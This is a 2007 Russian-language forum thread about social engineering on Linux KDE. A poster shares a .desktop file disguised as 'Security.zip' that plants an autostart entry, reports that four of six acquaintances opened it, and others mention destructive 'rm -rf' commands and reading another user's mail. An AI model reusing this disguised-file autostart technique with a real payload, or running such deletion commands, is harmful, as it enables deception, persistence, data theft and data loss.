Привет всем,
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Привет всем, - 2007-05-22 19:20:27.890000
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Привет всем,
Читаю Ваш форум давно, но зарегистрироваться решил только сегодня
Чисто для эксперимента решил проверить своих знакомых линуксоидов на предмет неуязвимости к соц.инженерии и прочей хрени.
Разослал шестерым емаил с описанием нового и важного security патча с советом сохранить на рабочий стол и кликнуть мышкой.
Из 6 четверо "повелись".
Так что линукс (КДЕ) защищён от соц.инженерии не более чем масдай.
Предлагаю вашему вниманию этот файл (он абсолютно безвреден–просто делает предупреждение. Так что можно опробовать "на себе")
========================================================
Security.zip.desktop
[Desktop Entry]
Exec=echo -e "[Desktop Entry] \n Exec=xmessage -title \"Warning–security hole discovered\" -center \"At least one security hole is discovered on your system. It is located between your desktop and your chair. Never open files if they come from untrusted source ! \" \n InitialPreference=2 \n MimeType=application/x-kdeuser1 \n Name=Memo \n Terminal=false \n Type=Application \n Icon=tar" > ~/.kde/Autostart/Memo.desktop
InitialPreference=2
MimeType=application/x-kdeuser1
Name=Security.zip
Terminal=false
Type=Application
Icon=tar
|
|
|
|
|
RE: Привет всем, - 2007-05-22 19:26:23.610000
|
|
|
BuriK666
Сообщений: 349
Оценки: 0
Присоединился: 2005-06-21 08:47:59
|
хмм, и в чем прикол?
quote:
Так что линукс (КДЕ) защищён от соц.инженерии не более чем масдай.
ты именно с Linux (KDE) общался? это твоих знакомых патчить нужно!
|
|
|
|
|
RE: Привет всем, - 2007-05-22 19:51:23.603333
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Существует народное поверье что каким бы чайником ни был user, если он сидит под Линуксом (КДЕ), то ему море по колено-никакие вирусы/аттачменты к емаил не страшны.
Прикол в том что (даже БЕЗ execution bit) в "автостарт" можно залить произвольный скрипт "уговорив" сохранить desktop-файл на рабочий стол. Более того-файл успешно маскируется под zip-архив.
|
|
|
|
|
RE: Привет всем, - 2007-05-22 19:57:38.120000
|
|
|
BuriK666
Сообщений: 349
Оценки: 0
Присоединился: 2005-06-21 08:47:59
|
да ты хоть rm -rf /* сделай
кроме твоих файлов ничего не потрется!!!!
|
|
|
|
|
RE: Привет всем, - 2007-05-22 20:15:17.613333
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
quote:
ORIGINAL: BuriK666
да ты хоть rm -rf /* сделай
кроме твоих файлов ничего не потрется!!!!
Конечно ты прав, но зачем же так сразу зверствовать ! rm -rf ~/* более разумный вариант.
А если серьёзно, где что хранится в КДЕ более-менее известно.
К тому же иногда бывают более скромные практические задачи–например, меня интересует почта/файлы данного человека а не всех членов локальной сети. Для этого прав локального пользователя вполне достаточно.
Впрочем, это скорее информация к размышлению на тему безопасности чем призыв к действию.
|
|
|
|
|
|
